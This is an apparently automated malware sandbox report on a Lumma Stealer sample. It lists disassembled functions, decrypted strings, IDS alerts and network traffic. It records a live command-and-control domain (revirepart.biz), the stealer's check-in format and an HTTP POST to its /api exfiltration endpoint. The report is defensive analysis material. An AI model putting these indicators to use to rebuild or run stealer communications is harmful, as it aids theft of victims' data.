Function 0246EF87 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0246F0AC

Strings

hzQ, xrefs: 0246EF9C
A0*#, xrefs: 0246EFA6
_mQ#, xrefs: 0246F148

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: hzQ$A0*#$_mQ#
API String ID: 3960555810-649192675
Opcode ID: f4b23709a365f10118cd6b76cd16a87f7e1a1f62e50d702f80f9d5be26480923
Instruction ID: 96013c0902ae73e8970757afda0a50a0d5e0f0385b760479ec94299f8fabe8f2
Opcode Fuzzy Hash: f4b23709a365f10118cd6b76cd16a87f7e1a1f62e50d702f80f9d5be26480923
Instruction Fuzzy Hash: 8EB1C571604B418FD739CF39C4607B3BBE2AF96204F19896EC0DB8BA42D77A64098B51

Function 0246F3ED Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0246F41E
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0246F51B

Strings

Y)|z, xrefs: 0246F608

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: Y)|z
API String ID: 3545744682-2475117699
Opcode ID: 98966fa27bd218655be42405ecca47b0313d3113b6fb8d2b6c23f9e43e06816e
Instruction ID: e9c4110944a63973f4d869dab5902af7a3f5cf3634be398a85eb3db0f1908975
Opcode Fuzzy Hash: 98966fa27bd218655be42405ecca47b0313d3113b6fb8d2b6c23f9e43e06816e
Instruction Fuzzy Hash: 21E11A20615B818EE725CF39C4547B3BBE19F57304F08999EC0EB87782D779A10ACB62

Function 0244DA8D Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0244DAA2

Strings

~, xrefs: 0244DAB7

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: ~
API String ID: 3861434553-1707062198
Opcode ID: e508596f480d3aac56f4816879aaed0947f4c07fe01637f97d6ab2d153d1b7d8
Instruction ID: c858f3d12c55ca88d5a1a27e33dbaa9d74d8877cb79dc2a1e24aea7f16032f11
Opcode Fuzzy Hash: e508596f480d3aac56f4816879aaed0947f4c07fe01637f97d6ab2d153d1b7d8
Instruction Fuzzy Hash: 6FB11E7590D3D18AE334CF29C4983ABBBE1AFD6304F18895DD4D95B342DB78810ACB92

Function 0247FAC0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0247D9CC,?,00000004,?), ref: 0247FAEE

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0247D1B0 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0247D250

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 842e99023ff5890d6f1b30f0b7e0b908fbbb051464dfffe9abbb6b27324044b7
Instruction ID: 0fd0abeb773f975ef675990f59d43639ae42356d2dbd4aff2a71cde3c243727a
Opcode Fuzzy Hash: 842e99023ff5890d6f1b30f0b7e0b908fbbb051464dfffe9abbb6b27324044b7
Instruction Fuzzy Hash: 4A016D31E5C150CFD30D5B38EC6256F7B52EB96714F14197CD882A7654C7354C11CB85

Function 0244A020 Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(B11B8F15,00000000,03020900), ref: 0244A0EF

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2f796dec3994d11d035fed5fa6c7cb43499b7a65fa845482c747182e3b67816d
Instruction ID: 693be99f697d96373f05b97f4807006dde21b670d2951bd45a33dda7e42fa5fa
Opcode Fuzzy Hash: 2f796dec3994d11d035fed5fa6c7cb43499b7a65fa845482c747182e3b67816d
Instruction Fuzzy Hash: 6411243029D3A04BC3049B30C8A57AF7BE5EBE6308F18492DE1D147341C77854058B62

Function 02473E66 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 02473EAD

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d52ae81aeb7cfffa5d43936da31b3d0f88c3608a865cc2fc985fc89c3d1bfa21
Instruction ID: 1c8c85b802da8fc3ac02cb5145ab2413fd1cded9150dee1d8dc9b0164637f780
Opcode Fuzzy Hash: d52ae81aeb7cfffa5d43936da31b3d0f88c3608a865cc2fc985fc89c3d1bfa21
Instruction Fuzzy Hash: E7F0F9746193418FD394DF14C4A875ABBE1BBC5308F04C91CE4888B384DBB59548CF82

Function 024725A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 024725E9

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 668d602f08c44922295b6a6b219a07848ab8c6892e4afc46480a2d797e0888e7
Instruction ID: ebbb06e5930391569d33beace929bcee1f530d5b32d1f063a74ad3b897f90c27
Opcode Fuzzy Hash: 668d602f08c44922295b6a6b219a07848ab8c6892e4afc46480a2d797e0888e7
Instruction Fuzzy Hash: 09F0DAB4509701CFD354DF28C0A8B1ABBF1FB89304F01880CE4958B3A0DBB6A948CF82

Function 0244D2E3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0244D2F5

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 4cd2de2884dbd651e49541c52e36f280d6f5dcfb9079882711074541be35b55b
Instruction ID: 7160f0dbaeb92353b59824c0ffc2d0adf5a7cf5776d6f925893b2766642d6b0e
Opcode Fuzzy Hash: 4cd2de2884dbd651e49541c52e36f280d6f5dcfb9079882711074541be35b55b
Instruction Fuzzy Hash: 58E01731BE530967FA684518EC07F4822425384B21F7C8618F311FE6C8D9B8B411450A

Function 0244D2B0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0244D2C3

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 4607a0a906ab8e84487b80c5928d7f8884c5b6a9547db3a0fb4a4c4d87ac4b8d
Instruction ID: bbedc9798babe48737c41959ae6d5af3fde226d679932c479331fe1e808b034d
Opcode Fuzzy Hash: 4607a0a906ab8e84487b80c5928d7f8884c5b6a9547db3a0fb4a4c4d87ac4b8d
Instruction Fuzzy Hash: 79D0A730DE46486FD24CB66DEC0FF1E3A6C9342765FC0061DF6A2CA1C1D9506D20C666

Function 0247D196 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0247D19E

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1db9b7a08d4538535316219767be6a4e79d81b9c860e3d03c071c2acbf331a2d
Instruction ID: 0840b8421c1d1dc580eb421c2e0bf32b763b5fb2a0be1f347dc07f1aa0823b7c
Opcode Fuzzy Hash: 1db9b7a08d4538535316219767be6a4e79d81b9c860e3d03c071c2acbf331a2d
Instruction Fuzzy Hash: 0FC04C36A90009AEDF151E84FC05BC8BB21FB54365F104062F6185A061C23255759B80

Non-executed Functions

Function 02475300 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 129clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02475314
GetWindowLongW.USER32 ref: 02475339
GetClipboardData.USER32 ref: 02475349
GlobalLock.KERNEL32 ref: 02475362
GlobalUnlock.KERNEL32 ref: 0247549A
CloseClipboard.USER32 ref: 024754A3

Strings

[, xrefs: 024753BE
^, xrefs: 024753C8
C, xrefs: 024753C3
M, xrefs: 024753D7
T, xrefs: 024753DC
E, xrefs: 024753B9
C, xrefs: 024753EB
F, xrefs: 024753E6
_, xrefs: 024753D2
J, xrefs: 024753CD
x, xrefs: 024753F0

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: C$C$E$F$J$M$T$[$^$_$x
API String ID: 2832541153-1009912999
Opcode ID: b8fc02f33cc1de564ff0e56cdd347a60ab4f979de46bf67c5faa411d2b036398
Instruction ID: 389cc54561ab9c6ba0522a486853b26ba3e88c2fa92602ef01c94641958cbfdc
Opcode Fuzzy Hash: b8fc02f33cc1de564ff0e56cdd347a60ab4f979de46bf67c5faa411d2b036398
Instruction Fuzzy Hash: 7A41717150C7818FD300EF78D88835FBFE1AB91215F49492DE9D58B382D6B98589CB93

Function 02469520 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

,-, xrefs: 02469EB8
57, xrefs: 02469D81

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: ,-$57
API String ID: 0-1747932499
Opcode ID: 62bc8f93aa3435972451c34ca264805370b19504863b9c0023e6765b927822ac
Instruction ID: 925a28d70afe466d4652e9facb6786c998b1e190040f5006175e24c4fe81d53d
Opcode Fuzzy Hash: 62bc8f93aa3435972451c34ca264805370b19504863b9c0023e6765b927822ac
Instruction Fuzzy Hash: 86A1DCB16093409BD7249F25D89536BBBE2FF86358F444D2EE0C54B380E7B9840ACB93

Function 024745D3 Relevance: 43.9, APIs: 1, Strings: 24, Instructions: 159memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02474691

Strings

*, xrefs: 024747EA
h, xrefs: 0247471A
=, xrefs: 024747BA
1, xrefs: 024747DA
\, xrefs: 0247472A
q, xrefs: 024746BA
), xrefs: 024747FA
a, xrefs: 024746AA
C, xrefs: 02474619
R, xrefs: 0247477A
I, xrefs: 024745E9
n, xrefs: 024746FA
0, xrefs: 02474929
, xrefs: 024747AA
., xrefs: 0247481A
B, xrefs: 02474611
O, xrefs: 024745F9
y, xrefs: 024746EA
, xrefs: 0247470A
-, xrefs: 0247480A
M, xrefs: 02474609
<, xrefs: 0247479A
}, xrefs: 024746DA
|, xrefs: 024746CA

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: AllocString
String ID: $ $)$*$-$.$0$1$<$=$B$C$I$M$O$R$\$a$h$n$q$y$|$}
API String ID: 2525500382-1673335896
Opcode ID: 065c42fdf88b443c89ef3febf08b83cc6402fc388a46178f4040b9330d5fdc67
Instruction ID: b6eb8b8f6f2de04fe10431c8967bcabfaa8c11821104470a2fba8f3ba5a0a064
Opcode Fuzzy Hash: 065c42fdf88b443c89ef3febf08b83cc6402fc388a46178f4040b9330d5fdc67
Instruction Fuzzy Hash: 4C91C66150C7C28EE3328A3C984879BBFD16BA3224F484A9ED5E94B2D3D7B54549C723

Function 0247406C Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 114COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 024740B2

Strings

8, xrefs: 02474154
7, xrefs: 0247411C
5, xrefs: 0247410C
?, xrefs: 024740DC
<, xrefs: 02474134
3, xrefs: 024740FC
4, xrefs: 02474174
%, xrefs: 02474184
-, xrefs: 02474164
1, xrefs: 024740EC

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID: %$-$1$3$4$5$7$8$<$?
API String ID: 1927566239-2306056897
Opcode ID: 20f14f4c03e440dced3b83a6655623f2b0453975aa2bc5d130987b2d100db57d
Instruction ID: 9991442a937c49a520fba264f161c412ead8ea70fcd4e16ebc09686cbb18e7b1
Opcode Fuzzy Hash: 20f14f4c03e440dced3b83a6655623f2b0453975aa2bc5d130987b2d100db57d
Instruction Fuzzy Hash: D7511B7060C7C18AD33A8B3894997DABFD19BA6314F084A6ED1E98B3D2C6B44645CB53

Function 024739AC Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 024739B6
VariantInit.OLEAUT32 ref: 024739C9

Strings

m, xrefs: 02473A13
m, xrefs: 024739EB
S, xrefs: 02473A1D
R, xrefs: 024739FF
X, xrefs: 02473A09
!, xrefs: 02473A3B
|, xrefs: 02473A27
], xrefs: 024739F5
h, xrefs: 024739E1

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$R$S$X$]$h$m$m$|
API String ID: 2610073882-107755797
Opcode ID: d3b2c0fd1852a0e7dcddfad4f218b81b1b4b15c78a93eb7b29b251627ba84d29
Instruction ID: 838189cfc0e707be83f7e39ef7d7bc1164232dd1f725e6e55be53c4ef9870389
Opcode Fuzzy Hash: d3b2c0fd1852a0e7dcddfad4f218b81b1b4b15c78a93eb7b29b251627ba84d29
Instruction Fuzzy Hash: 8841683110C7C18AD325DB78848879EFFD16BA6324F084A5DE5E10B3E6C7B98509CB63

Function 02473F1A Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02473F24
VariantInit.OLEAUT32 ref: 02473F37

Strings

m, xrefs: 02473F81
], xrefs: 02473F63
m, xrefs: 02473F59
S, xrefs: 02473F8B
!, xrefs: 02473FA9
h, xrefs: 02473F4F
X, xrefs: 02473F77
R, xrefs: 02473F6D
|, xrefs: 02473F95

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$R$S$X$]$h$m$m$|
API String ID: 2610073882-107755797
Opcode ID: 63fc7c9f9d518277ed9287ab6be5c1156630d286838e99d2161f7808a571ea5e
Instruction ID: 63e34193176cf1f7ef2d081bf5191d1a5e3ffa5ead0d1294f203f70a711960d0
Opcode Fuzzy Hash: 63fc7c9f9d518277ed9287ab6be5c1156630d286838e99d2161f7808a571ea5e
Instruction Fuzzy Hash: F441273050C7C18AD3158A78944875EFFE26BD6324F484A5DE4E14B3E6D7B9840ACB63

Source: https://revirepart.biz/	Avira URL Cloud: Label: malware
Source: https://revirepart.biz/api	Avira URL Cloud: Label: malware

Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp	String decryptor: revirepart.biz
Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -

Source: Network traffic	Suricata IDS: 2057646 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz) : 192.168.2.4:56745 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057647 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI) : 192.168.2.4:49730 -> 104.21.43.198:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.43.198:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.43.198:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49747 -> 104.21.88.250:443

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.43.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.88.250:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
